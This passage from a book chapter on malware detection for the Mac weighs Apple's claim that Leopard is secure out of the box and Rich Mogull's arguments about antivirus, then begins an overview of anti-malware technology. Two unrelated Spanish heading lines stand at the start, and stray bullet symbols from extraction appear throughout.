4. MARCO TEORICO Y CONCEPTUAL
4.3 LAS T.I.C Y EL ÁREA DE EDUCACIÓN RELIGIOSA
Malware Detection
and the Mac
Solutions in this chapter:
Safe Out of the Box?
Principles of Anti-Malware Technology Anti-Malware Products Product Testing ■ ■ ■ ■ ˛ Summary
˛ Solutions Fast Track
Introduction
Now that you know what malware is, what, if anything, should you do about it? Apple contends that “Every Mac is secure right out of the box,” thanks to the proven foundation of Mac OS X. Apple engineers have designed Leopard with more security to protect your personal data and make your online life safer (see Figure 4.1).
We will look more closely at what Apple means by secure, and discuss whether and when the intrinsic security of OS X is enough to obviate the need for third-party security software. We’ll then go on to look at the basic principles of anti-malware protection, and then look at specific technologies in more detail.
Safe Out of the Box?
The Web page (www.apple.com/macosx/technology/security.html) in Figure 4.1 describes a number of features of Leopard’s out-of-the-box security that we can break down as follows:
Transparent and easy to use.
Easy to update and patch, which has always been one of the better features of Operating System (OS) X. As discussed in the last chapter, however, while it’s important to patch system and application software to close critical vulnerabilities, many (or most) malicious programs are not self-launching and don’t rely on system vulnerabilities such as buffer and stack overflows. They’re user-launched (or hybrid) and work by tricking the victim into running them. There are no patches for human gullibility.
Open source core. In other words, the entire BSD development community is looking at core code, and Apple developers are tapping into that resource in order to improve security of core OS X components. This is a good thing, as is the fact that they work with CERT CC, DHS, and so on, but doesn’t necessarily have much of a bearing on malware issues, as addressed in the previous point.
Danger Free Downloads. This describes the “tagging” feature whereby Safari, iChat, and mail users are alerted if they’re about to open a downloaded application, and even checks an application’s digital signature, where available. These features only mitigate danger (slightly), rather than removing it. Since this feature doesn’t really test whether or not the application is malicious, it leaves the decision as to whether it’s safe to execute to the user. If the user wasn’t expecting to execute an application, that may make them suspicious of that application, but that suspicion can be overcome by efficient social engineering.
Encryption, Virtual Private Network (VPN), and folder sharing issues, though important, are not really germane to current Macintosh (Mac) malware. For example, network shares are a major entry point in the world of Windows for bots.
■ ■
■
■
Sandbox testing sounds like a great idea, if you’ve come across sandboxing in the context of anti-malware technology. As it happens, what Apple has in mind is a fairly limited application of sandboxing. Leopard sandboxes some of its own helper applications, such as the Spotlight indexer, by restricting their access to other files and the network, and their ability to launch other applications. This will close one potential loophole, but it doesn’t restrict the ability of other programs (malware in particular) to cause damage.
At www.apple.com/macosx/features/300.html#security (see Figure 4.2), Apple describes another security feature called library randomization. This is similar to Vista’s Address Space Layout Randomization (ASLR), whereby system files are loaded at random addresses in memory, making it harder for malicious code to locate and call privileged functions. Where Vista uses one of 256 randomly assigned addresses, Leopard relocates system libraries to one of several thousand addresses.
■
Tools & Traps
Leopard is not OS X
Leopard is actually the fifth major revision of OS X, and some of its security features are very different than those of earlier versions. It’s obviously naïve to expect all users of earlier versions to pay for every upgrade. The fact that so many applications not only keep pace with OS X upgrades, but abandon sup- port for previous versions with the same alacrity that Apple does, provides some incentive to do so. After all, even some open source developers have withdrawn versions earlier than 10.4 (Tiger). Some systems are incapable of running the latest versions without at least a memory upgrade, and perhaps not even then. And, somewhere in the world, there are still people running systems using OS 9.x or earlier, either from choice or because their hardware can’t handle OS X.
I’ll discuss the issues and options for computer users who can’t or won’t run the latest and greatest versions of Apple’s hardware and software later on in this section.
To their credit, Apple doesn’t make the mistake Jim Allchin of Microsoft made, when he touted this as a significant anti-worm measure. “So even if there is a remote exploit on one machine, and a worm tries to jump from one machine to another, the probability of that actually succeeding is very small.” But you shouldn’t make that mistake either. It’s not a bad idea, and it improves on the Vista model, but it’s not the death of Malware.
There’s a much more detailed description of the Leopard security model at http:// images.apple.com/macosx/pdf/MacOSX_Leopard_Security_TB.pdf. There is excel- lent stuff in there, and I don’t for a moment suppose that Apple is trying to mislead their customers, but statements such as, “You don’t have to be a security expert to configure your Mac to be secure at home or on the road, you just need to know how to turn on the computer. That’s because the default settings safely restrict how your Mac communicates on the network…” should not be mistaken for a guarantee of absolute safety. Take, for instance, the assertion that Leopard’s new application-based
firewall “makes it easier for non-experts to get the benefits of firewall protection” (see Figure 4.3). Blocking incoming connections on a “per-application basis rather than on a per-port basis” is not completely cosmetic. It’s certainly less restrictive than a blanket refusal of “non-essential” network services, but again throws the decision as to “what applications are safe” onto the shoulders of the user.
Furthermore, Apple has not yet learned enough from the misfortunes of Windows users, if the assumption here is that only incoming connections matter. If a personal (or corporate) firewall was enough to stop all malware, and you could assume that such a firewall could be configured with 100 percent security and leave the system reasonably usable, and you could assume that a given system would be configured to that standard, perhaps it would be true. In the real world, however, we believe that it’s worth monitoring outbound traffic as well. If, for instance, a bot of some sort takes
hold despite existing precautions, there’s the possibility of detecting it and mitigating its effects by stopping suspicious outbound traffic.
It’s reassuring that the more capable, more configurable IPFW firewall is still available for “expert users,” but this brings into question the usefulness of a turnkey firewall system. Doesn’t this argue that topnotch security is only available to those who have the expertise to configure a more professional two-way firewall (prefer- ably at the perimeter rather than on the end-user’s desktop)? Actually, I believe that to be true, but it seems to contradict Apple’s “safe out-of-the-box” position. In any case, I have yet to see a firewall as secure as Marcus Ranum’s “Perfect Firewall” (now “The Ultimately Secure Deep Packet Inspection And Application Security System” (see Figure 4.4).
Having established a better understanding of what Apple mean by “security”, perhaps it’s now easier to answer the question posed by Rich Mogull on the Mac news site Tidbits (http://db.tidbits.com/article/9511): “Should Mac Users Run Antivirus Software?” Mogull actually makes some very sound points.
“The reality is that today the Mac platform is relatively safe.” I might dispute his figures, but there are, as we’ve already seen, a tiny number of Mac-specific malicious programs. Unfortunately, he doesn’t consider the diminished but not irrelevant macro virus issue), many of which are “aimed at versions of the Mac OS prior to Mac OS X (and thus have no effect on a modern Mac).” However, we should bear in mind that it’s not only Mac-specific malware that we should consider. As discussed in the previous chapter, some Mac users are still vulnerable to infection by application-specific malware such as Microsoft Office macro viruses, even though (intentional) damage from macro payloads is a negligible risk. Also, there’s the issue of heterogeneous malware transmission
■
Tools & Traps
Configuring the Perfect Firewall
Here are Marcus’ instructions for configuration of this superb defensive measure.
For best effect, install the firewall between the central processing unit (CPU) and the wall outlet. Place the jaws of the firewall across the power cord, and bear down firmly. Be sure to wear rubber gloves while installing the firewall. If the firewall is installed prop- erly, all the lights on the CPU will turn dark and the fans will grow quiet. This indicates that the system has entered a secure state. For Internet use, install the firewall between the demarcation of the T1 to the Internet. Place the jaws of the firewall across the T1 line lead, and bear down firmly. When your Internet service provider’s network operations center calls to inform you that they have lost connectivity to your site, the firewall is correctly installed.
■
(HMT) whereby malware that can’t trigger directly on Macs is passed on to systems that are vulnerable. Mogull does acknowledge this phenomenon, though he doesn’t use that term. However, I’m not sure he (or other Mac users) recognize that this is not just a matter of taking precautions as a courtesy to Windows users, or even as a sop to corporate policy. It’s a vital component of responsible computing, and I’m sure that if and when Mac malware impacts seriously on the average Mac user’s computing experience, such users will expect Windows users to extend the same “courtesy” to them, by using security software that recognizes Mac threats as well as native Windows threats. “… malicious software these days is driven by financial incentives, and it’s far more profitable to target the most dominant platform.” Certainly most malware is profit driven, and this undoubtedly has a bearing on the fact that it’s mostly the platform with the biggest market share that is targeted. Mogull quotes Adam J. O’Donnell (see also the previous chapter), “Game theory shows that an inflection point will come when the rate at which a malware author can reliably compromise a PC rivals that of the Mac market share. It is at this time you will see monetized, profitable Mac malware start popping up.” My only issue with this point is that Mogull treats it as a prediction. I’d say that it’s now a historical fact. That doesn’t mean that Mac malware for profit is a big deal at the moment, only that it already exists in some quantity, and is likely to become more of a problem rather than less.
“Desktop AV software is also only a limited defense, and one that’s typically very resource intensive.” I think the claim here is that there are more effec- tive ways of blocking malware that don’t involve the processing overhead entailed by the installation of memory-resident (on-access) AV software. In fact, this is a variation on the theme of “I don’t need desktop security because I have perimeter protection.” This might even be appropriate in some cases, depending on where you consider your perimeter to be. The Internet is not the only threat vector. One of the most common threat vectors at the time of writing is USB and other devices and media that can use the “Autorun” facility (autorun.inf ) commonly in the Windows environ- ment. OS X does not generally support such self-launching programs and scripts, but there is nothing to stop the unwary user launching malicious software from CDs and flash drives.
■
In this article, however, Mogull extends this thought to include the use of e-mail accounts such as Gmail and Hotmail, that incorporate filtering for spam and malware. Not a bad thought, though some kinds of spam and scam often get through these filters. Malicious attachments get through more rarely (and Mac malware hardly ever at present), but it happens.
Clearly, AV programs can’t catch all malware, despite the huge improvements in the development of proactive detection using heuristic and behavioral analysis, and it can be argued (as Mogull argues) that for Mac users (and, indeed, Vista users) the overhead does not justify the “intrusive” and “resource-intensive” encroachment of AV software. (Actually, he’s talking primarily about full system scans, which are rarely necessary on systems where a competent on-access scanner is run. I’ll talk more about these technological issues later in this chapter.) For a Mac user, I agree that there is still some scope for the individual user to make his own decisions about whether to justify the trade-off between cost (both unit cost and resource
■
Damage & Defense
What Do We Mean by Known Malware?
Mogull also claimed that “By even the most positive assessments, AV software catches only 85 to 95 percent of known malicious software (viruses, worms, Trojans, and other nasty stuff) in the wild.” Actually, AV software should catch 100 percent of known malware, that is, malware for which it has signature detection, which should, in turn, include all malware that is technically in the wild. That is, malware validated as being “In the Wild” by inclusion in the WildList (see www.wildlist.org). (It’s true that anti-malware products do sometimes fail WildList testing(see Figure 4.5). But it’s the unknown software (i.e., software for which it has no signature) that is the main differentiator between good and indifferent commercial products in the wider world of AV (the WildList has rarely included Mac-specific malware to date). Nowadays, it’s difficult to argue that AV detects anywhere near as much as 85 percent of unknown mal- ware. However, this is not a reason not to use it unless you have a much better alternative or you have grounds for thinking that the risk is outweighed by other considerations.
impact) and security, less so in a corporate environment. However, I wouldn’t and don’t care to run an unprotected Windows PC, even one that operates under Vista.
“If you engage in risky online behavior, use AV software and definitely switch to Firefox with NoScript.” While opinion varies on what constitutes “risky” behavior, I’m not about to argue that AV software is a bad idea, and NoScript is definitely worth considering.
“If you use your Mac in an enterprise environment with AV policies, you still need to use AV software.” I once worked in an environment where it was considered unnecessary to protect Macs, but it only took me about three years to change managerial minds.
“If you run Windows on your Mac via Boot Camp or virtualization, install Windows AV software. Even if you’re running Mac AV tools, they won’t help you when you’re running Windows. You need to protect that partition or virtual machine just as if it were any other Windows system.” I couldn’t agree more. Actually, it’s an argument I was making forcibly in the mid-1990s, but the grounds for the argument haven’t changed, even though the emulators have.
■
■
■
Anti-malware Technology
Why anti-malware rather than AV? Well, as we’ve already seen, viruses are not the only problem. In fact, they’re not necessarily the most important class of malware any more. There are plenty of alternatives to AV. Programs that describe themselves as anti-spyware, anti-Trojan, or anti-rootkit are available all over the Internet. Some of them aren’t anti-malware applications. We sometimes describe these as rogue anti- malware (or anti-spyware) applications, and as mentioned before, they’re starting to appear for the Mac, though not in the same quantities as their Windows equivalents. These are at best useless and frequently malicious. But there are plenty of legitimate and useful programs that detect a subset of the whole class of malicious software. Confusingly, some of them are marketed by the same companies who also market a full-blown anti-malware/AV product line. For instance, many vendors now have a separate (often free) anti-rootkit program.
This doesn’t mean that what we used to call AV software (and still do sometimes) only detects viruses. Most commercial AV software actually detects a wider range of malware than specialist detection products that are sometimes marketed as necessary “because AV products only detect viruses.” However, a more specialized program may detect more of whatever it is it detects than an AV program. Even this can vary depending on such factors as the program’s ability to detect generically rather than detecting specific malware. Also, mainstream AV vendors may have particularly efficient co-operative sample sharing mechanisms, established over many years of experience and hard-won trust between vendors.
In fact, most of what most people describe indiscriminately as viruses, should really be described as malware. That doesn’t mean that antivirus (AV) products won’t or shouldn’t attempt to detect it. It may simply be that our ability to detect other malware continues to be underestimated because we’ve been (fairly) successful at detecting replicating malware (viruses and worms) over so many years.
Of course, AV generally detects all known viruses (i.e., viruses for which a signature exists) for the platform on which they are designed to work. That means that commer- cial Windows AV generally detects all the known viruses for Windows and DOS.